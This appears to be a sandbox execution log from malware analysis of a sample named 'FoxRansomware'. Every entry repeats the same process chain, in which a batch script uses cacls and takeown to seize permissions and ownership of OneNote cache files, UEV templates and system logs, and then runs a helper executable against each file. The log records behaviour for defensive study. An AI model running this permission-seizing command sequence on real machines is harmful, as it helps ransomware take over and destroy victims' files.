C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin""2⤵PID:5652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin" /E /G Admin:F /C3⤵PID:5264
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007Q.bin"3⤵PID:3836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007Q.bin" -nobanner3⤵PID:5284
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007Q.bin" -nobanner4⤵PID:5004
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin""2⤵PID:1364
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin" /E /G Admin:F /C3⤵PID:3244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008F.bin"3⤵PID:3416
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008F.bin" -nobanner3⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008F.bin" -nobanner4⤵PID:2420
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin""2⤵PID:5620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin" /E /G Admin:F /C3⤵PID:5236
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000095.bin"3⤵PID:6128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000095.bin" -nobanner3⤵PID:412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000095.bin" -nobanner4⤵PID:5728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin""2⤵PID:3616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin" /E /G Admin:F /C3⤵PID:3336
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\000000A0.bin"3⤵PID:404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "000000A0.bin" -nobanner3⤵PID:4960
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "000000A0.bin" -nobanner4⤵PID:2428
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml""2⤵PID:5792
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml" /E /G Admin:F /C3⤵PID:1952
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\EaseOfAccessSettings2013.xml"3⤵
- Modifies file permissions
PID:5224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner3⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "EaseOfAccessSettings2013.xml" -nobanner4⤵PID:492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml""2⤵PID:5904
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml" /E /G Admin:F /C3⤵PID:5320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin64.xml"3⤵
- Modifies file permissions
PID:5136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner3⤵PID:2560
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2013BackupWin64.xml" -nobanner4⤵PID:5536
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml""2⤵PID:3668
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml" /E /G Admin:F /C3⤵PID:6020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin64.xml"3⤵PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner3⤵PID:2120
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOutlook2013CAWin64.xml" -nobanner4⤵PID:5756
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5148
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""2⤵PID:2996
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C3⤵PID:6028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"3⤵PID:2548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner3⤵PID:5412
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner4⤵PID:1936
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5228
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:5180
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:5348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:4060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "overlay.png" -nobanner3⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "overlay.png" -nobanner4⤵PID:440
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:5216
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:5464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵PID:5780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "resource.xml" -nobanner3⤵PID:5460
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "resource.xml" -nobanner4⤵PID:5768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""2⤵PID:4932
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C3⤵PID:5240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"3⤵
- Modifies file permissions
PID:5772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "tasks.xml" -nobanner3⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "tasks.xml" -nobanner4⤵PID:284
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:6100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""2⤵PID:2568
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat" /E /G Admin:F /C3⤵PID:4508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat"3⤵PID:5472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "StorageHealthModel.dat" -nobanner3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "StorageHealthModel.dat" -nobanner4⤵PID:4448
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml""2⤵PID:3028
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml" /E /G Admin:F /C3⤵PID:5848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2010Win64.xml"3⤵PID:1128
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner3⤵PID:276
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2010Win64.xml" -nobanner4⤵PID:5324
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml""2⤵PID:1848
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml" /E /G Admin:F /C3⤵PID:5832
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016Win64.xml"3⤵PID:1832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner3⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MicrosoftOffice2016Win64.xml" -nobanner4⤵PID:4544
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5888
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml""2⤵PID:5668
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml" /E /G Admin:F /C3⤵PID:2208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml"3⤵
- Modifies file permissions
PID:2744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "ThemeSettings2013.xml" -nobanner3⤵PID:4024
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "ThemeSettings2013.xml" -nobanner4⤵PID:5864
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5208
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.470c040b-9369-4cf0-8b9e-576c005c8f8f.1.etl""2⤵PID:5448
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.470c040b-9369-4cf0-8b9e-576c005c8f8f.1.etl" /E /G Admin:F /C3⤵PID:5508
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.470c040b-9369-4cf0-8b9e-576c005c8f8f.1.etl"3⤵PID:2800
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "NotificationUxBroker.470c040b-9369-4cf0-8b9e-576c005c8f8f.1.etl" -nobanner3⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "NotificationUxBroker.470c040b-9369-4cf0-8b9e-576c005c8f8f.1.etl" -nobanner4⤵PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin""2⤵PID:2480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin" /E /G Admin:F /C3⤵PID:3108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin"3⤵PID:3908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000005.bin" -nobanner3⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000005.bin" -nobanner4⤵PID:2408
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5812
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin""2⤵PID:5328
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin" /E /G Admin:F /C3⤵PID:5384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin"3⤵PID:4040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000I.bin" -nobanner3⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000I.bin" -nobanner4⤵PID:5512
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5280
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin""2⤵PID:6028
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin" /E /G Admin:F /C3⤵PID:1936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000000T.bin"3⤵PID:5532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000000T.bin" -nobanner3⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000000T.bin" -nobanner4⤵PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5176
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin""2⤵PID:5084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin" /E /G Admin:F /C3⤵PID:5908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000017.bin"3⤵PID:6068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000017.bin" -nobanner3⤵PID:5932
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000017.bin" -nobanner4⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:640
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl""2⤵PID:2456
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl" /E /G Admin:F /C3⤵PID:4884
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "MoUsoCoreWorker.47f218bb-2167-405f-a4e8-07715739cb59.1.etl" -nobanner4⤵PID:3276
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:376
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin""2⤵PID:2080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin" /E /G Admin:F /C3⤵PID:304
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000006J.bin"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000006J.bin" -nobanner3⤵PID:3592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000006J.bin" -nobanner4⤵PID:2332
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin""2⤵PID:5388
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin" /E /G Admin:F /C3⤵PID:5588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000007R.bin"3⤵PID:5928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000007R.bin" -nobanner3⤵PID:3576
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000007R.bin" -nobanner4⤵PID:5660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin""2⤵PID:1436
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin" /E /G Admin:F /C3⤵PID:5152
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\00000085.bin"3⤵PID:276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "00000085.bin" -nobanner3⤵PID:2828
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "00000085.bin" -nobanner4⤵PID:5724
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin""2⤵PID:5296
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin" /E /G Admin:F /C3⤵PID:4544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000008R.bin"3⤵
- Modifies file permissions
PID:3336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000008R.bin" -nobanner3⤵PID:5888
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000008R.bin" -nobanner4⤵PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\nYxkhGV1.bat" "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin""2⤵PID:2208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin" /E /G Admin:F /C3⤵PID:6088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\Admin\AppData\Local\Microsoft\OneNote\16.0\cache\0000009H.bin"3⤵PID:4032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c otHboBGk.exe -accepteula "0000009H.bin" -nobanner3⤵PID:5424
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula "0000009H.bin" -nobanner4⤵PID:5400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\otHboBGk.exeotHboBGk.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:5896
-
-
-
